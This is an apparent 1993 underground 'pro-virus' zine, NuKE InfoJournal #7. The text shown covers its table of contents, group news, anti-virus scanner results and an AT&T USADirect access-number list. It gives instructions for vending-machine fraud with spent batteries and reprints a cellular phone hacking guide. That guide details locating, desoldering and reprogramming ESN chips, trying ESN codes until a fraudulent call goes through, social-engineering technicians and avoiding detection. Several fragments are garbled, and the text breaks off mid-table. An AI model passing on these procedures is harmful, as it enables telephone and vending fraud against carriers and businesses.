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KE                                                                           -N
-N                       NuKE Informational Journal                          uK
uK                               Issue #7                                    E-
E-                              August 1993                                  Nu
Nu                                                                           KE
KE             (C) Copyright 1993 NuKE Software Publishing Inc.              -N
-N                                                                           uK
uK  NuKE is a corporation officialy registered with the Canadian government  E-
E-                                                                           Nu

NuKE InfoJournal #7
August 1993

Article Topics
000. Table of Contents (this file)...........................................
001. A NuKE International News Update........................................
002. AT&T USADirect Information..............................................
003. Cellular Telephones Hackers Guide : Cellular System Intro        PART 1.
004. Cellular Telephones Hackers Guide : Hackers' Best Scams          PART 2.
005. Cellular Telephones Hackers Guide : Home System ID Codes         PART 3.
006. Cellular Telephones Hackers Guide : Buyers Guide & Publications  PART 4.
007. Cellular Telephones Hackers Guide : Programming Instructions     PART 5.
008. The Original DaeMaen Virus (source code)................................
009. Uncommon And Rare Explosives............................................
010. The Dangers of Thunderbyte's TBClean Emulation Techniques...............
011. Varicella-][ Virus Eats Up Thunderbyte's TBClean (source code)..........
012. CARO's Undisclosed Meeting Agenda................................PART 1.
013. CARO's Undisclosed _Illegal_ Meeting Agenda......................PART 2.
014. Toll Fraud Device (2600 reprint)........................................
015. To sara gordon Or Not To sara gordon That Is The Question...............
016. An E-Z Guide To Remote UNIX Disk Mounting...............................


                       % NuKE Membership and Supporters %

NuKE Members
Rock Steady............Canada
Nowhere Man............USA
Savage Beast...........Switzerland
Phrozen Doberman.......Australia
Screaming Radish.......Australia
Dr. X..................Canada
Night Hawk.............Australia
Pure Energy............Canada
Shindaq Arl'hur........Australia
The Weird One..........Australia

NuKE Contributors and Supporters
Commander Tosh.........Bulgaria
Little Loc.............USA
Lone Wolf..............South Africa
Time Lord [P/S]........Canada
Wolfee J...............USA
Radioactive Rat........South Africa
Winnie the Pooh........Bulgaria

Greets to:  Phalcon/SKISM, Trident, Urnst Kouch and the CryPt team,
            Control-C (612), Alan Solomon, Guido Sanchez, CARO, Nitro-187,
            Megadeth, Kim Clancy, Pallbearer (welcome back!), SubLogic,
            Sara "dark avenger is my lover" Gordon, Ned-239, all
            pro-virus individuals worldwide, and everyone out there who's
            a victim of "the system."

W H E R E   T O   C O N T A C T   N U K E
Cybernetic Violence........+1 514 426 9194  v32b  NuKE World HQ
Black Axis.................+1 804 599 4152  v32b  NuKE American HQ
The Brutal Truth...........+61  3 899 9213  Dual  NuKE Australian HQ
Enigma E:N:U:N.............+41 22 340 0329  v32b  NuKE European HQ
TRATEOTU...................+27 11 884 2270  2.4k  NuKE African HQ

NuKE members can also be contacted over our international network, NuKENet.

          uK                                                       E-
          E-            "NuKE International News Update"           Nu
          Nu                                                       KE
          KE                         By                            -N
          -N                                                       uK
          uK                    The NuKE Crew                      E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

% NuKE International News Update %

IJ#6 Errata
Unfortunately several mistakes were made in NuKE InfoJournal #6.
Article #4 ("IRIS Guide") was written by Nitro-187, not Ned-239 as
indicated in some copies of the InfoJournal.  In article #2 ("A Guide to
the North American Numbering System"), by Nowhere Man, the non-published
number percentage chart should list Bakersfield, California as being in
area code 805.  We apologize for any inconvenince to our readers or

Two Years Of NuKE!
This month marks the second year of NuKE's existance!  NuKE was founded
in August 1991 as an H/P group local to 514 (Montreal, Canada).  Since
then NuKE has matured and evolved in to an international pro-virus
group with a worldwide network and many inovative products.  Two
years may not seem like much, but there have been very few "groups"
that have lasted this long...

News From Europe
NuKE now has four sites in Europe, adding Land of Lost Souls in
Sofia, Bulgaria (sysop:  Winnie the Pooh).  Winnie is working on adding
sites in the former USSR and other parts of Eastern Europe.  Savage
Beast reports that sites are under consideration in Spain; he is unable
to add any French sites because of overzealous computer crime laws in
that country.  A Belgian site is on the way, too.  Besides Land of Lost
Souls, NuKE maintains three boards in Switzerland, one in the French-
speaking areas and two in the German-speaking areas.  NuKE's European branch
is finally growning again after the closing of several of its sites due
to hardware problems, personal difficulties, and police raids.

NuKE Site Changes
Cybernetic Violence, NuKE's world headquarters, now has a new number.      
It can be reached 24 hours a day, 7 days a week at +1 514 426 9194.        
The old number is no longer valid!  Cybernetic Violence (sysop:  Pure      
Energy) is located in Montreal, Quebec, Canada, and runs 24 hours/day      
7 days/week at 14.4k v.32bis.  Cybernetic Violence is also the central
hub of NuKENet.
The Hell Pit (sysop:  Hades), located in Chicago, Illinois, USA, has
upgraded its modem and is now running at 14.4k v.32bis.  The Hell Pit
can be reached 24 hours/day 7 days/week at +1 708 459 7267.

New 500 Area Code                                                          
In July 1993 Bellcore, the agency designated to assign area codes          
and exchanges (NXXs) for the U.S., Canada, and the Caribbean,              
announced that starting sometime in August (pending U.S. government        
approval) it will allocate numbers in the 500 NPA for use by               
personal communication services.  Exchanges will be handed out             
to corporations if they show a real need -- already AT&T and               
Atlantic Bell have asked for exchanges.  In the future, NPA 500            
will probably also be used for cellular phones, pagers, and other          
mobile services.                                                           
Quelle Horrible!  Rock Steady French?!                                     
In an interview done by Netta Gilboa of _Gray Areas_ Magazine              
(an excellent publication, highly recommended) with Urnst Kouch,           
published in Gray Areas no. 3 and reprinted in Computer Underground Digest 
vol. 5 no. 44, Urnst Kouch states in error that "Rock Steady is            
French-Canadian."  We here at NuKE would like to make it very clear that   
Rock Steady is not French, never was French, and never will be French.     
Not everyone who lives in Quebec is a Francophone...                       
NuKENet -- One Year Old And Still Growing!                                 
This summer marks the first anniversary of the creation of NuKENet.        
NuKENet began in mid-1992 as a mail link between Cybernetic Violence
in Canada and Total Mayhem in Australia.  It has since grown into          
a huge multinational network with sites in Europe, Africa, Australia,      
and North America.  In fact, NuKENet can now be reached via the FidoNet    
backbone at NUKE_THEWORLD -- request it today!                             
Interested in joining NuKENet?  We'd be happy to have you, *if* you're     
the right kind of system...  Boards wishing to join NuKENet should         
contact a net administrator; if that's not possible, mail any NuKE member
or supporting sysop for information.
Area           Contact          System                   Phone Number      
~~~~           ~~~~~~~          ~~~~~~                   ~~~~~~~~~~~~      
United States  ARiSToTLE        Black Axis               +1 804 599 4152
Europe         Savage Beast     Enigma E:N:U:N           +41 22 340 0329
Africa         Lone Wolf        TRATEOTU (22h-15h GMT+2) +27 11 884 2270
Australia/NZ   Phrozen Doberman The Brutal Truth         +61 3 899 9213
Canada/Other   Pure Energy      Cybernetic Violence      +1 514 426 9194

Area Split For Alabama                                                     
On July 22, 1993 South Central Bell announced that Alabama will become     
the first state to gain an interchangable (NXX) area code.  In 1995 area   
code 205 will split; Huntsville and Birmingham will remain in 205, while   
Montgomery and Mobile will move to area code *334*.  More details
will be published as they become available.                                
The following chart summerizes the remaining North American area code      
NPA/NEW  Location             Split               Full Cutover             
~~~~~~~  ~~~~~~~~             ~~~~~               ~~~~~~~~~~~~             
416/905  Ontario, Canada      October 4, 1993     March 1994 (TBA)         
919/910  North Carolina, USA  November 14, 1993   February 13, 1994        
313/810  Michigan, USA        December 1, 1993    August 10, 1994          
215/610  Pennsylvania, USA    1994 (TBA)          TBA                      
205/334  Alabama, USA         1995 (TBA)          TBA                      
Trick Of The Month                                                         
Special thanks to Vest from 708 for an intresting tidbit of information --
spent three volt lithium batteries (model number CR-2032) will register    
as nickles in coin-operated vending machines!  Use old, exhausted          
batteries only, though, since new batteries are around US$2.00 each...     
This has only been tested in the U.S., but the CR-2032 is even closer      
in circumference and weight to the Canadian nickle.  If you call around, you
might be able to pick up bags of spent batteries for "recycling."  Note:
this information is for informational purposes only, and is meant to alert
owners of coin-operated devices so that such fraudulent acts might be      
detected and prevented.

Tough Swiss Anti-Piracy Laws
In response to rampant piracy throughout the country the Swiss government
has enacted tough new anti-piracy laws that force people convicted of
using pirated software to name the person(s) providing the software or
face additional penalties.  In Switzerland piracy has been particularly
bad, with most businesses using pirated software and some huge pirate
boards charging up to US$500 for unlimited access to copyrighted programs.
Viruses are not affected by the new law:  possessing and creating viruses
are still legal in Switzerland.

Anti-Virus Results
Savage Beast has conducted experiments with various anti-virus products
and has concluded that "a lot of them only look good...they're really
shit."  No surprise there...however Savage has provided us with scientific
data to back up his claims.  Below are the results of scanning with the
latest versions (as of July 1993) of various virus scanners -- judge for

Product     Maker          Virus Tested  Virus Found  MTE Tested  MTE Found
~~~~~~~     ~~~~~          ~~~~~~~~~~~~  ~~~~~~~~~~~  ~~~~~~~~~~  ~~~~~~~~~
SCAN 106    McAfee                 2547         2075         200        200
M.S. AV     Microsoft              2547         1500         200          0
F-Prot      F. Skulason            2547         2253         200        200
XScan       Anyware                2547         2151         200        200
C.P. AV     Central Point          2547         1700         200          0
Norton AV   Symantec               2547         1566         200          3
HackBuster  H&B                    2547         1776         200          0
ViruSafe    Heliashim              2547         1896         200          0

As you can see, even the "best" products (F-Prot, XScan, SCAN) will miss
between 15% and 20% of current viruses.  Even if you think your computer
is "protected" from viruses you can still get a virus from one out of five
infected programs...and that's not counting MTE-using viruses -- only three
of the scanners provide acceptable protection against the Mutation Engine,
which has been out for over two and a half years.  Each time you put a
new disk in your floppy drive, ask yourself if this might be the "1 in 5."

                             The NuKE Crew
          uK                                                       E-
          E-              "AT&T USADirect Information"             Nu
          Nu                                                       KE
          KE                         By                            -N
          -N                                                       uK
          uK                     Nowhere Man                       E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

% AT&T USADirect %

With international telephone services becoming more and more integrated and
international calls becoming more and more common, it only makes sense than
calling cards would also evolve to ease international calling.  AT&T       
Calling Cards are usable to call back to the U.S. from over 170 different  
countries, and to even call *between* 46 countries outside the U.S. (called
AT&T World Connect<tm> service).  The AT&T USADirect Service<tm> is        
available in over 110 countries.  This service connects you immediately    
back to an English-speaking AT&T operator in the U.S., who will take your  
calling card number and place your call for you.  The following is the     
procedure for using USADirect:                                             
1. Dial the USADirect access number for the country you're calling from.   
2. An English-language voice prompt will ask for the telephone number      
   you are calling.  Enter the area code and seven-digit phone number.     
3. After the tone, enter your 14-digit AT&T Calling Card number, which     
   includes the last four digits, your PIN.  If you're calling collect,    
   press zero for an English-speaking operator.                            
If you are at a telephone that does not have access to automated service,  
simply wait for the English-speaking AT&T operator to greet you. To call   
from country to country using World Connect<tm> service, please wait for   
the AT&T operator to assist you.  The operator will ask for your AT&T      
Calling Card number and place the international call for you.  To place    
additional calls, press # after your party hangs up and follow the voice   
To call 800 numbers, ask the AT&T operator to connect you.  Unfortunately, 
she will only connect calls to AT&T 800 customers...however, this USADirect
service can be used by people who live outside the U.S. to reach 800       
numbers.  You don't need to have an AT&T Calling Card to do this.          
Use your regular AT&T Calling Card number, not the international number.   
To learn more about USADirect service, call (800) 331 1140 ext. 406 from   
the U.S., or call collect to +1 412 553 7458 ext. 806 from abroad.         
Country                 Phone Number                                       
~~~~~~~                 ~~~~~~~~~~~~                                       
Andorra                 19 (wait for second dial tone) 0011                
Anguilla                1-800-872-2881                                     
Antigua                 872 (Boatphone Marine) or #1 (public card phones)  
Argentina               001-800-200-1111                                   
Aruba                   800-1011                                           
Australia               0014-881-011                                       
Austria                 022-903-011                                        
Bahamas                 1-800-872-2881                                     
Bahrain                 800-001                                            
Belgium                 078-11-0010                                        
Belize                  555                                                
Bermuda                 1-800-872-2881                                     
Bolivia                 0-800-1111                                         
Brazil                  000-8010                                           
British Virgin Islands  1-800-872-2881                                     
Cambodia                800-0011                                           
Cape Verde Islands      112                                                
Cayman Islands          1-800-872-2881                                     
Chile                   00 (wait for second dial tone) 0312                
China                   10811                                              
Columbia                980-11-0010 (English) or 980-11-0011 (Spanish)     
Costa Rica              114                                                
Cyprus                  080-90010                                          
(former) Czechoslovakia 00-420-00101                                       
Denmark                 8001-0010                                          
Dominica                1-800-872-2881                                     
Dominican Republic      1-800-872-2881                                     
Ecuador                 119                                                
Egypt                   510-0200 (in Cairo) or 02-510-0200 (elsewhere)     
El Salvador             190                                                
Faeroe Islands          8001-0010                                          
Finland                 9800-100-10                                        
France                  19 (wait for second dial tone) 0011                
Gabon                   00 (wait for second dial tone) 001                 
Gambia                  00111                                              
Germany                 0130-0010                                          
Ghana                   0191                                               
Gibraltar               8800                                               
Greece                  00-800-1311                                        
Grenada                 872                                                
Guam                    018-872                                            
Guatemala               190                                                
Guyana                  165                                                
Haiti                   001-800-872-2881                                   
Honduras                123                                                
Hong Kong               800-1111                                           
Hungary                 00 (wait for second dial tone) 800-01111           
Iceland                 999-001                                            
India                   000-117                                            
Indonesia               00-801-10                                          
Ireland                 1-800-550-000                                      
Israel                  177-100-2727                                       
Italy                   172-1011                                           
Ivory Coast             00-1111                                            
Jamaica                 0-800-872-2881                                     
Japan                   0039-111                                           
Kenya                   0800-10                                            
Korea                   009-11                                             
Kuwait                  800-288                                            
Liberia                 797-797                                            
Liechtenstein           155-00-11                                          
Luxembourg              0-800-0111                                         
Macao                   0800-111                                           
Malawi                  101-1992                                           
Malaysia                800-0011                                           
Malta                   0800-890-110                                       
Monaco                  19 (wait for second dial tone) 0011                
Montserrat              1-800-872-2881                                     
Netherlands             06 (wait for second dial tone) 022-9111            
Netherlands Antilles    001-800-872-2881                                   
New Zealand             000-911                                            
Nicaragua               64 (in Managua) or 02-64 (elsewhere)               
Nigeria                 1881                                               
Norway                  050-12011                                          
Panama                  109                                                
Paraguay                0081-800 (in Asuncion only)                        
Peru                    191                                                
Philippines             105-11                                             
Poland                  0 (wait for second dial tone) 010-480-0111         
Portugal                05017-1-288                                        
St. Kitts/Nevis         1-800-872-2881                                     
Saipan                  235-2872                                           
San Marino              172-1011                                           
Saudi Arabia            1-800-100                                          
Singapore               800-0011                                           
Spain                   900-99-00-11                                       
Sri Lanka               430-430                                            
Suriname                156                                                
Sweden                  020-795-611                                        
Switzerland             155-00-11                                          
Taiwan                  0080-10288-0                                       
Thailand                0019-991-1111                                      
Turkey                  9 (wait for second dial tone) 9-8001-2277          
United Arab Emirates    800-1-0010                                         
United Kingdom          0800-89-0011                                       
Uruguay                 00-0410                                            
Venezuela               80-011-120 (English) or 80-011-121 (Spanish)       
(former) Yugoslavia     99-38-0011                                         
Zambia                  00-899                                             
Zimbabwe                110-899                                            
Notice that most numbers include 011, the international dialing prefix in  
the U.S. and Canada, or 288, "ATT" on the telephone keypad...  Note that
Canada is not included in the list since AT&T Calling Cards can be used in 
Canada the same way they are used in the U.S. (0+NPA+NXX-XXXX or placed    
through the operator).  The following countries will accept AT&T Calling   
Cards, but access to USADirect is restricted to special phones at certain  
places that Americans tend to congregate (hotels, airports, rail stations, 
etc.):  Barbados, Ethiopia, Mexico, Qatar, Romania, St. Lucia, Seychelles  
Islands, Sierra Leone, Trinidad and Tobago, Turks and Caicos, Uganda, and  
AT&T USADirect is an easy way to call the U.S. from abroad.  Of course,    
you have to have an AT&T Calling Card to use the service...  Happily, AT&T 
will issue calling cards to people who do not use AT&T long distance       
service, including people who do not live in the USA.  Call (800) 525 7955 
for more information on obtaining an AT&T Calling Card outside the U.S. (or
call (800) 222 0300 if you want to obtain a calling card billed to your    
U.S. home phone line).                                                     
Information for this article was compiled from "International Dialing      
Guide," a booklet published by AT&T's International Information Service.   
You can obtain one for yourself (they're free) by calling (800) 874 4000   
and asking for it.                                                         
                            Nowhere Man/NuKE
          uK                                                       E-
          E-   "The _COMPLETE_ Cellular Telephone Hackers Guide    Nu
          Nu                        PART 1                         KE
          KE            The Cellular Telephone System"             -N
          -N                       OCRd By                         uK
          uK                    The NuKE Crew                      E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

[The following five part series consists of information that we scanned in
from the book "The Complete Cellular Telephone Hackers Guide" published by
Dynaspek Inc. of Westmont, Illinois, USA.  Reprinted without permission.  You
can order this book by sending US$53.95 (incl. S/H) by check or money order
to Dynaspek, P.O. Box 564, Westmont, IL 60559, or call them at +1 708 971 1585
for more information.  -NM]

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% NOTICE %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
The information in this manual is intended to be used as an educational guide
for those seeking technical information about Cellular Mobile Telephone (CMT)

While the information in this manual is meant to serve as a guide to cellular
phone vulnerabilities, keep in mind that it is against the law to modify a 
cellular phone for fraudulent use. The law states that no person shall intercept
or receive, or assist in intercepting or receiving, any communications service
offered over a cellular telephone frequency unless specifically authorized to
do so by a local telephone company or as may otherwise be specifically 
authorized by law. 

Therefore, it is the sole responsibility of the user of this manual to conform
to the rules and regulations of both Federal and State/Provincial government
in the use of the information contained herein. It is the responsibility of the
user of this manual to arrange and pay for, as necessary, and signals used in
testing any of the circuits or information contained herein. 

The authors and those that helped research this article accept _no_ liability
or responsibility for the misuse of the information in this manual, or for any 
modifications made on any cellular mobile telephone.

% Cellular System Operation %

The Cellular Mobile Telephone Systems is a low-powered, full duplex, radio/
telephone which operates between 800 and 900 Mhz, using multiple transceiver
sites linked to a central computer for coordination. The sites, or "cells",
named for their honeycomb shape, cover a range of three to six, or more, miles.
(five to nine kilometres) in each direction. Their range is limited only by
certain natural or man-made objects. 

The cells overlap one another and operate at different transmitting and 
receiving frequencies in order to eliminate cross-talk when transmitting from
cell to cell. Each cell can accommodate up to 45 different voice channel 
transceivers. When a cellular phone is activated, it searches available 
channels for the strongest signal and locks on to it. While in motion, if 
signal strength begins to fade, the telephone will automatically switch signal
frequencies or cells as necessary without operator assistance. It fails to
find an acceptable signal, it will display an "out of service" or "no service"
message, indicating that it has reached the limit of its range and is unable to

% Identification %

Each mobile telephone has a unique identification number which allows the Mobile
Telephone Switching Office (MTSO) to track and coordinate all mobile phones in 
its service area. This ID number is known as the Electronic Security Number 
(ESN). The ESN and Telephone Number are NOT the same. The ESN is permanent 
number engraved into a memory chip called a PROM or EPROM, located in the
telephone chassis. 

This number cannot be changed through programming as the telephone number
can, although it can be replaced. Each time the telephone is used, it 
transmits its ESN to the MTSO by means of DTMF tones during the dialling
sequence. The MTSO can determine which ESN's are good or bad, thus individual
numbers can be banned from use within the system.

Call Switching 

Cell sites switching is done automatically by the MTSO. The MTSO constantly
monitors signal strength data of both the caller and the receiver. To maintain
signal quality, when signal strength begins to fade, the MTSO locates the next
best cell site and re-routes the channels to maintain the communications link.
The switch takes approximately 300 milliseconds and is not noticeable to the
user. All switching is handled by computer, with the control channels telling
each cellular unit when and where to switch.

% The Numeric Assignment Module (NAM) %

A Numeric Assignment Module, or NAM, is a programmable, read-only-memory (PROM).
The NAM holds a limited amount of data, usually only 128 or 256 bits. NAM's 
used are typically made by either NEC or Signetics. Common chip numbers are 
82S23, 82S123 or equivalent. Other NAM's are manufactured by National 
Semiconductors, Fujitsu, Texas Instruments, AMD and others. The NAM is actually
a 32-word by 8 bit PROM which is programmed with a PROM programmer/burner. The
32x8 PROM (256 bits, 32 word by 8 bit) bits are like fuses. A programmer will
trigger certain fuses within the NAM in order to give the phone a unique
identity and certain options. 

NAM's are easy to purchase. Only the number of the chip is needed to buy one.
Consulting the latest issue of an IC MASTER is one way to determine what's 
inside the chip and who distributes it. 

The NAME is used to store the Mobile Identification Number (MIN), Lock Code,
the Home Systems Identification number (SIDH), and various other system
data. From the beginning address of the NAM, 00, you will find the System
Identification Home number (SIDH). Each market allows for two systems. These 
two digits are even for the wire-line and odd for the non-wireline. 

There are two kinds of NAMs used in cellular telephones:
"TRI-STATE" and "OPEN COLLECTOR" It is _mandatory_ to identify the type of
NAM in your cellular telephone before attempting to replace it. After it has
been identified, any of the electronic supply companies should be able to 
supply a replacement. A TRI-STATE NAM can be used in over 95% of the cellular
telephones on the market today containing replaceable NAM's.

The identify the NAM chip compare the numbers in the READILY AVAILABLE NAME
TYPES table to the various chips on the circuit board for a match. The NAM 
chip is usually factory mounted on a ZIF socket.

    cellular phone stores in your area. ***


                          Open Collector               Tri-State
NAM Brand                 Part Number                  Part Number

AMD                       AM27LS18                     AM27LS19
Fujitsu                   MB7056                       MB7051
Harris                    HM7602                       HM7603
MMI                       53/63S080                    53/63S081
MMI                       53/6330                      53/6331
NSC                       DM54S188                     DM54S288
NSC                       DM82S23                      DM82S123
TI                        TBP38SA030                   TBP38S030
TI                        74S188                       74S288 (the most common)
                                                   (try National Semiconductor)

% Programming the NAM %

NAM's are generally mapped the same in all cellular phones. Codes such as 
Mobile Id numbers (MIN1, MIN2), Homer System Id (SIDH), Access Overload Class
(ACCOLC), Group Identification Mark (GIM), Electronic Serial Number (ESN), and 
options are programmed into the NAM. 

% Format Map for NAM %

0          SIDH(14-8)                           00
           SIDH(7-0)                            01     (8x32 NAM)
LU   0     0    0    0    0     0    MIN        02      
A/B  RI    MIN2(33-28)                          03
     MIN(27-24)      0    0     0    0          04
0    0     0    0    MIN(23-20)                 05
           MIN1(19-12)                          06
           MIN1(11-4)                           07
     MIN1(3-0)       0    0     0    0          08
0    0     0    0    SCM(3-0)                   09
0    0     0    0    0    IPCH(10-8)            0A
           IPCH(7-0)                            0B
0    0     0    0    ACCOLC(3-0)                0C
0    0     0    0    0    0     0    PS         0D
0    0     0    0    GIM(3-0)                   0E
LOCK DIGIT 1         LOCK DIGIT 2               0F
LOCK DIGIT 3         LOCK DIGIT 4               10
EE   0     0    0    0    0     0    REP        11
HA   0     0    0    0    0     0    HF         12
     SPARE                                      14
     SPARE                                      15
     SPARE                                      16
     SPARE                                      17
     SPARE                                      18
     SPARE                                      19
     SPARE                                      1A
     SPARE                                      1B
     SPARE                                      1C
     SPARE                                      1D
     NAM CHECKSUM                               1E
     NAM CHECKSUM                               1F

% Cell Terms for the above abbreviations %

A/B : A switch located on the mobile telephone that allows the user to select
      which frequency black (carrier) he or she wishes to use. Some telephones
      have an internal switch from one block to the other when service is not
      available on the pre-set block. 

ACCOLC : Access Overload Class. There is no standard in use within the 
         United States at this time. This system offers priority depending
         on how it is selected in the event of system overload. Typically
         set to 0 plus the last digit of the phone number to provide random
         loading. Originally, when the Federal government began designing
         cellular systems, they intended to give emergency vehicles (such as
         police, ambulances, and Fire Departments) codes that would allow them
         priority over other subscribers, to communicate during emergencies.

EE : End to End signalling. DTMF signals are sent through the lines to
     signal the end of a conversation. A tone code is also used to access
     long distance carriers, to signal your answering machine, or to access 
     your voice mail.

GIM : Group Identification Mark. This is a two-digit number assigned by the
      cellular carrier which determines roaming rights throughout the system.
      As cellular systems are upgraded, the GIM will be on line real time,
      requiring all NAM information, including the Mobile Identification 
      Number (MIN), to be validated before a subscriber is allowed to call
      outside of their home area. 

IPCH : Initial Paging Channel. 334 - wireline systems. 333 - non-wirelne 

LOCK DIGIT : This field is a one - four digit code. It locks the cellular
             telephone to prevent unauthorized use. The lock code is 
             programmed into the NAM, and is frequently factory set to
             either 1234 or 0004.

LU : Local Use flag. Occasionally used to initialize approval for local calls.
     The cellular carrier insures that local users are registered with a
     local system. Hackers use the Roaming Technique to avoid this 

HA : Horn Alert. 0 or 1. A 1 in this field tells the cellular phone that
     this feature is available.

HF : Hands Free. 0 or 1. A 1 in this field tells the cellular phone that
     this feature is enabled.

MIN1 : Mobile Identification Number. The telephone number assigned to 
       the telephone by the cellular carrier. If the telephone is brought
       in, or a new one is purchased, the cellular service assigns this 
       number for both billing and for receiving calls. 7 or 10 digits in

MIN2: The area code of the cellular phone number.

MIN MARK : Can be 0 or 1. The home station sends extended address data upon
           origination and page response.

REP : Repertory dialling. Speed dialling. Some phones are capable of storing
      100 numbers.

SCM : Station Class Mark. Identifies the phone as either a hand-held or 
      transportable/fixed cellular phone. SCM is determined by the transmit
      power of the phone (0.8 watts for hand-held, 1.2, 3.0 watts for 

SIDH : Home System Id. Code used to identify the Home system where the cellular
       telephone is registered. (See the Home System Id Listing Article)

% What About the Electronic Serial Number (ESN) %

An Electronic Serial Number, or ESN, is the unique, 32-bit, eleven-digit
serial number for each cellular telephone sold. The ESN is transmitted each
time a cellular telephone places a call. It is used to verify whether a 
cellular telephone is registered with an authorized carrier. A dealer needs 
the ESN in order to restore the service on a used phone. 

The first three numbers are the manufacturer's decimal code. The fourth and
fifth are reserved, and may contain any digit, zero through nine. The 
remaining six numbers are the decimal serial number for each individual

         1  2  3         4  5      6  7  8  9  10  11
      Manufacturers    Reserved    Decimal serial number
         ESN code        0-9          of the phone

The decimal serial number can occasionally be found within the documentation
provided with a new cellular phone. In some cases, the ESN is engraved on
the telephone itself, but this is not universal with all manufacturers. 

If a cellular telephone has been disconnected for any reason, the ESN must be
provided in order for service to be reestablished with the Carrier. Each 
manufacturer assigns their own ESN to every mobile telephone. Therefore, a
single ESN may be duplicated by one or more manufacturers. A hacker may 
bypass this system by altering other system information and leaving the 
particular telephone's ESN unaltered. 

    caught ***

The ESN is assigned at the factory, and in almost all cases, is the only 
element that cannot be altered by use of the programming sequence without 
removing it and replacing it with a new chip. The ESN chip is always factory
soldered and occasionally epoxide onto the circuit board to reduce tampering.
A decent hacker will be able to remove it and install a ZIF (Zero Insertion
Force) socket in its place. The ZIF socket makes it easy to replace the ESN
chip at any time. The NAM chip usually factory installed in a ZIF socket.

% How to locate the ESN %

Several methods are available for locating a cellular telephone ESN. These 
methods are as follows:

  1. The ESN is normally located on a PROM. The ESN is intentionally made to
     be unerasable on most cellular phones to prevent the fraudulent use of
     the phone. The PROM is programmed and installed at the factory with the
     security fuse blown in order to prevent tampering. The ESN code on a PROM
     may be read by removing the PROM from the cellular telephone and placing
     it in a PROM reader to obtain a memory map of the chip. The ESN PROM is
     distinctive because of its size and package. The ESN PROM will have 
     between sixteen and twenty-eight leads, in a square or rectangular 
     package. This is a BIPOLAR PROM. Most cellular telephones will accept
     the National Semiconductor 32x8 PROM, which cannot be reprogrammed. 
     If a hacker knew the ESN of a particular cellular telephone, it is 
     possible to trace the memory map by installing the PROM in a reader and
     obtaining a fuse map by use of the READ MASTER switch of the PROM 
     programmer. Many PROM programmers contain a VERIFY and COMPARE switch
     to provide a comparison of one PROM's programming with another. 

     This may be a complicated task for the first-timer, so it is 
     recommended that a cellular telephone (bag phones are best) is
     purchased strictly for the purpose of dismantling it in order to locate
     the ESN. This will probably destroy the telephone, but will provide
     valuable experience.

 *** Some of the newer hand-held phone manufacturers (Motorola) are changing
     to VLSI (very large scale integration) which combine several other chips
     with the ESN chip, preventing hackers from programming those ships. Bag
     phones are almost an easy hack. ***
  2. Hire a "Cellular Consultant." A consultant is someone who works as an
     installer and/or programmer, and would be able to show the user where
     the ESN is located.

  3. Get in touch with a local cellular telephone servicer and simply ask 
     for their help in identifying the memory chips in the telephone. Most
     technicians will help without too much difficulty. (It's called 
     social engineering)

  4. As a last resort, remove each memory chip and place it in a PROM reader.
     When one if found that registers a reading, the ESN has been located.

  5. Take the phone to a cellular service provider and ask them to provide
     the ESN. They are often requested for insurance purposes, and can be
     supplied easily enough by use of a Cellular Service Monitor. The monitor
     reads the transmissions from the telephone and indicates the specific ESN.

  6. The ESN is also normally provided with the original user information, if

  7. ESN chips may be identified by some of the following manufacturers'

    article for further information on Personal Readers. ***

% Replacing the ESN %

Now that you've located the ESN, how do you replace it? The ESN needs to be
unsoldered in order to remove it. The user should be familiar with soldering
techniques, extra care must be taken not to touch any of the surrounding
connections, solder joints or chips. I do recommend you get a de-soldering
pen, you should get the pen with the suction pump, it will remove the 
solder nicely. Chip pullers and de-soldering tools are available from any
electronical semiconductors store, even Radio Shack. 

The following steps will aid in ESN removal:

1. Unscrew and remove the entire PC board containing the ESN. This is done 
   to prevent inadvertent damage to the rest of the unit during the 
   removing process. 

2. Once you have determined which is the correct ESN chip, it is wise to make
   a sketch of it to insure that it is replaced in the proper place and
   direction. (Don't laugh, just DO IT.)

3. Using extreme caution, unsolder and remove the chip from the board. 

4. Solder in a ZIF (Zero Insertion Force) socket to provide for easier removal
   and placement of additional chips. 

     which the ESN has been removed. In addition, it is their responsibility
     to notify the proper authorities of such tampering. So if you screw up
     get a _trustable_ friend to help or trash the unit. ***

5. Once the ZIF socket has been installed, reinsert the ESN and attempt to
   place a call. If the call is successfully completed, the ESN has been 
   properly removed and replaced. If the call does not go through, recheck
   the leads on the ZIF socket for proper installation.

6. Insert the ESN in a PROM reader to be sure it gets a reading. Use the
   search mode to identify the Manufacturer's Serial Number, in order to
   identify the first three addresses of the ESN on the PROM where 
   reprogramming will be done. 

% Programming the ESN %

Insert the ESN in a PROM programmer to be sure it gets a reading. Use the
search mode and "read master" to identify the Manufacturer's Serial Number,
in order to identify the first three addresses of the ESN on the PROM fuse
map where programming the new chip will be done. Record the locations of the
ESN. Use the "edit buffer" command to change one number of the ESN. A new PROM
is then programmed with the PROM programmer. Instructions will come with the

The entire PROM reading/emulating/programming process is relatively fast when 
a personal computer is available. (Some PROM programmers allow RS-232 interface
with the IBM-PC clone, with the help of a computer program.) This will allow
the use of an EPROM emulator and allow you to program (burn) PROM chips 
directly from the computer. 

The Installation of the ZIF socket makes it possible to insert an EPROM
emulator into the socket. The hacker will often try a hundred or more ESN codes
before finding a good one. Use of an EPROM Emulator will allow the hacker to
load ESN codes without burning EPROMs until a good code is found and will 
save the hacker hundreds of chips with the wrong codes programmed into them.

Use the emulator and the code read from the original chip, re-code a new PROM.
Change the original ESN code by one number. Load the emulator and try making
a phone call. Keep trying this process until a call is completed. The entire
process is often completed in less than one-two hours.

A Programmer for use with a personal computer will allow the hacker to store 
codes for easy editing and reprogramming new chips when the Cellular carrier
blocks the particular ESN is use. Use the working ESN code from above to burn
a new PROM and insert into the ZIF.

    to minimize the possibility of being caught. ***

    any traceable calling habits. ***

Some other manufacturer's cellular telephones are privately labelled for 
certain companies. However, when reprogramming a cellular telephone, any
valid ESN code will work on any phone. The numbers listed bellow are all 
Valid ESN Codes.

% Manufacturer's ESN Codes %

Manufacturer                           Decimal           Hex Code

Alpine Electronics                       150                96
AT&T                                     158                9E
Audiovox-Audiotel                        138                8A
Blaupunkt (Bosch)                        148                94
Clarion Company                          140                8C
Clarion Manufacturing Company            166                A6
CM Communications                        153                99
Di-Bar Electronics                       145                91
E.D. Johnson                             131                83
Emptel Electronics                       178                B2
Ericsson                                 143                8F
